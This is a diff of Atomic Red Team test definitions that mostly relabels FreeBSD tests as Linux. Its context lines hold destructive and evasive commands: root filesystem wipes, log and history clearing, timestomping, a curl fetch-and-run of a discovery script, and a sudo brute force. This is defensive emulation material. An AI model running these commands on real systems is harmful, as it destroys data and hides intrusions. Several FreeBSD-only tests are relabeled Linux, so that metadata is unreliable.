description: |
|
||||
This test overwrites the contents of system log file with an empty string using echo utility
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
echo '' > /var/log/messages
|
||||
@@ -234,7 +234,7 @@ atomic_tests:
|
||||
description: |
|
||||
This test deletes the messages log file using unlink utility
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
unlink /var/log/messages
|
||||
|
||||
@@ -88,7 +88,7 @@ rm ~/.bash_history
|
||||
## Atomic Test #2 - Clear sh history (rm)
|
||||
Clears sh history via rm
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 448893f8-1d5d-4ae2-9017-7fcd73a7e100
|
||||
@@ -144,7 +144,7 @@ echo "" > ~/.bash_history
|
||||
## Atomic Test #4 - Clear sh history (echo)
|
||||
Clears sh history via echo
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
|
||||
@@ -200,7 +200,7 @@ cat /dev/null > ~/.bash_history
|
||||
## Atomic Test #6 - Clear sh history (cat dev/null)
|
||||
Clears sh history via cat /dev/null
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
|
||||
@@ -256,7 +256,7 @@ ln -sf /dev/null ~/.bash_history
|
||||
## Atomic Test #8 - Clear sh history (ln dev/null)
|
||||
Clears sh history via a symlink to /dev/null
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 3126aa7a-8768-456f-ae05-6ab2d4accfdd
|
||||
@@ -312,7 +312,7 @@ truncate -s0 ~/.bash_history
|
||||
## Atomic Test #10 - Clear sh history (truncate)
|
||||
Clears sh history via truncate
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** e14d9bb0-c853-4503-aa89-739d5c0a5818
|
||||
@@ -370,7 +370,7 @@ history -c
|
||||
## Atomic Test #12 - Clear history of a bunch of shells (freebsd)
|
||||
Clears the history of a bunch of different shell types by setting the history size to zero
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
|
||||
@@ -514,7 +514,7 @@ echo -e 'pwd101!\npwd101!' | passwd testuser1
|
||||
## Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd)
|
||||
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
|
||||
|
||||
@@ -17,7 +17,7 @@ atomic_tests:
|
||||
description: |
|
||||
Clears sh history via rm
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
rm ~/.sh_history
|
||||
@@ -38,7 +38,7 @@ atomic_tests:
|
||||
description: |
|
||||
Clears sh history via echo
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
echo "" > ~/.sh_history
|
||||
@@ -59,7 +59,7 @@ atomic_tests:
|
||||
description: |
|
||||
Clears sh history via cat /dev/null
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
cat /dev/null > ~/.sh_history
|
||||
@@ -81,7 +81,7 @@ atomic_tests:
|
||||
description: |
|
||||
Clears sh history via a symlink to /dev/null
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
ln -sf /dev/null ~/.sh_history
|
||||
@@ -101,7 +101,7 @@ atomic_tests:
|
||||
description: |
|
||||
Clears sh history via truncate
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
truncate -s0 ~/.sh_history
|
||||
@@ -124,7 +124,7 @@ atomic_tests:
|
||||
description: |
|
||||
Clears the history of a bunch of different shell types by setting the history size to zero
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
unset HISTFILE
|
||||
@@ -192,7 +192,7 @@ atomic_tests:
|
||||
description: |
|
||||
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: |
|
||||
Install sshpass and create user account used for excuting
|
||||
|
||||
@@ -34,7 +34,7 @@ There are tools available from the host operating system to perform cleanup, but
|
||||
## Atomic Test #1 - Delete a single file - FreeBSD/Linux/macOS
|
||||
Delete a single file from the temporary directory
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480
|
||||
@@ -84,7 +84,7 @@ mkdir -p #{parent_folder} && touch #{file_to_delete}
|
||||
## Atomic Test #2 - Delete an entire folder - FreeBSD/Linux/macOS
|
||||
Recursively delete the temporary directory and all files contained within it
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e
|
||||
@@ -372,7 +372,7 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
|
||||
## Atomic Test #9 - Delete Filesystem - FreeBSD
|
||||
This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
|
||||
|
||||
@@ -6,7 +6,6 @@ atomic_tests:
|
||||
description: |
|
||||
Delete a single file from the temporary directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -37,7 +36,6 @@ atomic_tests:
|
||||
description: |
|
||||
Recursively delete the temporary directory and all files contained within it
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -182,7 +180,7 @@ atomic_tests:
|
||||
description: |
|
||||
This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
chflags -R 0 /
|
||||
|
||||
@@ -28,7 +28,7 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
|
||||
## Atomic Test #1 - Set a file's access timestamp
|
||||
Stomps on the access timestamp of a file
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810
|
||||
@@ -77,7 +77,7 @@ echo 'T1070.006 file access timestomp test' > #{target_filename}
|
||||
## Atomic Test #2 - Set a file's modification timestamp
|
||||
Stomps on the modification timestamp of a file
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52
|
||||
@@ -129,7 +129,7 @@ Stomps on the create timestamp of a file
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
|
||||
@@ -172,7 +172,7 @@ Modifies the `modify` and `access` timestamps using the timestamps of a specifie
|
||||
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50
|
||||
|
||||
@@ -6,7 +6,6 @@ atomic_tests:
|
||||
description: |
|
||||
Stomps on the access timestamp of a file
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -33,7 +32,6 @@ atomic_tests:
|
||||
description: |
|
||||
Stomps on the modification timestamp of a file
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -62,7 +60,6 @@ atomic_tests:
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -88,7 +85,6 @@ atomic_tests:
|
||||
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
|
||||
@@ -115,7 +115,7 @@ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
|
||||
This test simulates an infected host beaconing to command and control.
|
||||
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658
|
||||
|
||||
@@ -66,7 +66,6 @@ atomic_tests:
|
||||
This test simulates an infected host beaconing to command and control.
|
||||
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
|
||||
@@ -91,7 +91,7 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
|
||||
## Atomic Test #3 - Stage data from Discovery.sh (freebsd)
|
||||
Utilize curl to download discovery.sh and execute a basic information gathering shell script
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 4fca7b49-379d-4493-8890-d6297750fa46
|
||||
|
||||
@@ -40,7 +40,7 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize curl to download discovery.sh and execute a basic information gathering shell script
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Location to save downloaded discovery.bat file
|
||||
|
||||
@@ -310,7 +310,7 @@ userdel -r art
|
||||
## Atomic Test #9 - Create local account (FreeBSD)
|
||||
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
||||
@@ -389,7 +389,7 @@ A system administrator may have locked and expired a user account rather than de
|
||||
|
||||
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 09e3380a-fae5-4255-8b19-9950be0252cf
|
||||
@@ -469,7 +469,7 @@ cat /etc/passwd |grep nobody
|
||||
## Atomic Test #13 - Login as nobody (freebsd)
|
||||
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 16f6374f-7600-459a-9b16-6a88fd96d310
|
||||
|
||||
@@ -123,7 +123,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -164,7 +164,7 @@ atomic_tests:
|
||||
|
||||
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -206,7 +206,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
|
||||
@@ -134,7 +134,7 @@ ls -al /Applications
|
||||
## Atomic Test #3 - List OS Information
|
||||
Identify System Info
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c
|
||||
@@ -244,7 +244,7 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
|
||||
## Atomic Test #6 - FreeBSD VM Check via Kernel Modules
|
||||
Identify virtual machine host kernel modules.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** eefe6a49-d88b-41d8-8fc2-b46822da90d3
|
||||
@@ -301,7 +301,7 @@ hostname
|
||||
## Atomic Test #8 - Hostname Discovery
|
||||
Identify system hostname for FreeBSD, Linux and macOS systems.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133
|
||||
@@ -433,7 +433,7 @@ set
|
||||
## Atomic Test #12 - Environment variables discovery on freebsd, macos and linux
|
||||
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720
|
||||
@@ -904,7 +904,7 @@ grep vmw /proc/modules
|
||||
## Atomic Test #26 - FreeBSD List Kernel Modules
|
||||
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 4947897f-643a-4b75-b3f5-bed6885749f6
|
||||
|
||||
@@ -28,7 +28,6 @@ atomic_tests:
|
||||
description: |
|
||||
Identify System Info
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -85,7 +84,7 @@ atomic_tests:
|
||||
description: |
|
||||
Identify virtual machine host kernel modules.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat | grep -i "vmm"
|
||||
@@ -106,7 +105,6 @@ atomic_tests:
|
||||
description: |
|
||||
Identify system hostname for FreeBSD, Linux and macOS systems.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -165,9 +163,8 @@ atomic_tests:
|
||||
description: |
|
||||
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: |
|
||||
env
|
||||
@@ -369,7 +366,7 @@ atomic_tests:
|
||||
description: |
|
||||
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat
|
||||
|
||||
@@ -103,7 +103,7 @@ http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
|
||||
|
||||
https://perishablepress.com/list-files-folders-recursively-terminal/
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de
|
||||
@@ -147,7 +147,7 @@ rm #{output_file}
|
||||
## Atomic Test #4 - Nix File and Directory Discovery 2
|
||||
Find or discover files on the file system
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e
|
||||
|
||||
@@ -47,9 +47,8 @@ atomic_tests:
|
||||
|
||||
https://perishablepress.com/list-files-folders-recursively-terminal/
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -73,9 +72,8 @@ atomic_tests:
|
||||
description: |
|
||||
Find or discover files on the file system
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
|
||||
@@ -34,7 +34,7 @@ Commands such as <code>net user</code> and <code>net localgroup</code> of the [N
|
||||
## Atomic Test #1 - Enumerate all accounts (Local)
|
||||
Enumerate all accounts by copying /etc/passwd to another file
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f
|
||||
@@ -72,7 +72,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #2 - View sudoers access
|
||||
(requires root)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2
|
||||
@@ -111,7 +111,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #3 - View accounts with UID 0
|
||||
View accounts with UID 0
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397
|
||||
@@ -150,7 +150,7 @@ rm -f #{output_file} 2>/dev/null
|
||||
## Atomic Test #4 - List opened files by user
|
||||
List opened files by user
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
|
||||
@@ -240,7 +240,7 @@ sudo apt-get install login; exit 1;
|
||||
## Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd)
|
||||
Show if a user account has ever logged in remotely
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 0f73418f-d680-4383-8a24-87bc97fe4e35
|
||||
@@ -278,7 +278,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #7 - Enumerate users and groups
|
||||
Utilize groups and id to enumerate users and groups
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e
|
||||
|
||||
@@ -6,7 +6,6 @@ atomic_tests:
|
||||
description: |
|
||||
Enumerate all accounts by copying /etc/passwd to another file
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -25,7 +24,6 @@ atomic_tests:
|
||||
description: |
|
||||
(requires root)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -47,7 +45,6 @@ atomic_tests:
|
||||
description: |
|
||||
View accounts with UID 0
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -68,7 +65,6 @@ atomic_tests:
|
||||
description: |
|
||||
List opened files by user
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -114,7 +110,7 @@ atomic_tests:
|
||||
description: |
|
||||
Show if a user account has ever logged in remotely
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -133,7 +129,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize groups and id to enumerate users and groups
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
|
||||
@@ -20,7 +20,7 @@ Enable traffic redirection.
|
||||
|
||||
Note that this test may conflict with pre-existing system configuration.
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd
|
||||
|
||||
@@ -8,9 +8,8 @@ atomic_tests:
|
||||
|
||||
Note that this test may conflict with pre-existing system configuration.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
proxy_server:
|
||||
description: Proxy server URL (host:port)
|
||||
|
||||
@@ -237,7 +237,7 @@ brew install tor
|
||||
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
|
||||
Upon successful execution, the tor proxy service will be launched.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 550ec67d-a99e-408b-816a-689271b27d2a
|
||||
|
||||
@@ -124,7 +124,7 @@ atomic_tests:
|
||||
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
|
||||
Upon successful execution, the tor proxy service will be launched.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: |
|
||||
|
||||
@@ -19,7 +19,7 @@ SSH keys can also be added to accounts on network devices, such as with the `ip
|
||||
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host.
|
||||
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc
|
||||
|
||||
@@ -9,9 +9,8 @@ atomic_tests:
|
||||
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host.
|
||||
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
|
||||
@@ -72,7 +72,7 @@ On Windows, adversaries may use various utilities to download tools, such as `co
|
||||
## Atomic Test #1 - rsync remote file copy (push)
|
||||
Utilize rsync to perform a remote file copy (push)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409
|
||||
@@ -120,7 +120,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
|
||||
## Atomic Test #2 - rsync remote file copy (pull)
|
||||
Utilize rsync to perform a remote file copy (pull)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f
|
||||
@@ -168,7 +168,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
|
||||
## Atomic Test #3 - scp remote file copy (push)
|
||||
Utilize scp to perform a remote file copy (push)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344
|
||||
@@ -204,7 +204,7 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
|
||||
## Atomic Test #4 - scp remote file copy (pull)
|
||||
Utilize scp to perform a remote file copy (pull)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33
|
||||
@@ -240,7 +240,7 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
||||
## Atomic Test #5 - sftp remote file copy (push)
|
||||
Utilize sftp to perform a remote file copy (push)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e
|
||||
@@ -276,7 +276,7 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
|
||||
## Atomic Test #6 - sftp remote file copy (pull)
|
||||
Utilize sftp to perform a remote file copy (pull)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef
|
||||
@@ -597,7 +597,7 @@ Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually
|
||||
## Atomic Test #14 - whois file download
|
||||
Download a remote file using the whois utility
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab
|
||||
|
||||
@@ -6,7 +6,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize rsync to perform a remote file copy (push)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -44,7 +43,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize rsync to perform a remote file copy (pull)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -81,7 +79,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize scp to perform a remote file copy (push)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -110,7 +107,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize scp to perform a remote file copy (pull)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -139,7 +135,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize sftp to perform a remote file copy (push)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -168,7 +163,6 @@ atomic_tests:
|
||||
description: |
|
||||
Utilize sftp to perform a remote file copy (pull)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -359,7 +353,6 @@ atomic_tests:
|
||||
description: |
|
||||
Download a remote file using the whois utility
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
|
||||
@@ -379,7 +379,7 @@ An adversary may find themselves on a box (e.g. via ssh key auth, with no passwo
|
||||
|
||||
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** abcde488-e083-4ee7-bc85-a5684edd7541
|
||||
|
||||
@@ -234,7 +234,7 @@ atomic_tests:
|
||||
|
||||
